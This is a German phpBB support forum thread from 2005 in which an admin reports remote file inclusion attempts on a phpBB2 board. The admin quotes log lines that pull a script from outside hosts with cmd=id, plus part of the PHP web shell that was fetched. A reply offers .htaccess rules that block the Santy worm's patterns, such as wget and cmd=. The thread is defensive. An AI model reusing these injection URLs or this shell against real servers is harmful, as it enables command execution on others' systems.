neue Wurmform?
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
neue Wurmform?
Hallo,
ich glaube bei mir gabs einen neuartigen Wurmangriff. Bisherige Angriffe wurden mittels .htaccess und Mod rewrite und dem CBACK Mod ausgebremst.
Nun steht im Log:
Request URI:
/phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id
Kennt jemand von Euch diese Variante?
ich glaube bei mir gabs einen neuartigen Wurmangriff. Bisherige Angriffe wurden mittels .htaccess und Mod rewrite und dem CBACK Mod ausgebremst.
Nun steht im Log:
Request URI:
/phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id
Kennt jemand von Euch diese Variante?
Das ist der komplette Eintrag:
18.03.2005, 12:15
200.165.125.85
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) /phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id
sieht so aus, als ob das jemand direkt auf der Website in seinen Browser eingegeben hat.
die hinterlegte Datei hat folgenden Inhalt:
&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";
echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
}
?>
18.03.2005, 12:15
200.165.125.85
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) /phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id
sieht so aus, als ob das jemand direkt auf der Website in seinen Browser eingegeben hat.
die hinterlegte Datei hat folgenden Inhalt:
&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";
echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
}
?>
Heute schon wieder eine neue Variante:
/phpBB2/lexique.php?lettre=http://www.zenobio.net/lila.jpg?&cmd=id
http://www.zenobio.net/lila.jpg?&cmd=id
Seit Google die Beiträge aus meinem Board aufgenommen hat gibts mehrere Angriffe pro Minute
/phpBB2/lexique.php?lettre=http://www.zenobio.net/lila.jpg?&cmd=id
http://www.zenobio.net/lila.jpg?&cmd=id
Seit Google die Beiträge aus meinem Board aufgenommen hat gibts mehrere Angriffe pro Minute
- larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
da mir keine aktive query mit cmd=[...] einfällt, sollte folgende .htaccess auch diese anfrage ins nirvana schicken:
Code: Alles auswählen
# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]-
Destruktor
- Mitglied
- Beiträge: 123
- Registriert: 27.02.2004 22:42
- Wohnort: Verden (Aller)
- Kontaktdaten:
Wenn ich die .htaccess angelege:
Ist die Seite nicht mehr erreichbar (403)
Code: Alles auswählen
# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]Dann ist mit höchster Wahrscheinlichkeit das PHP-Modul mod_rewrite bei dir entweder nicht eingeschaltet, oder gar nicht erst erlaubt bei deinem Anbieter... Frag deinen Host-Provider danach...
Meine Signatur war zu groß und wurde deshalb gelöscht - Siehe phpBB.de-Knigge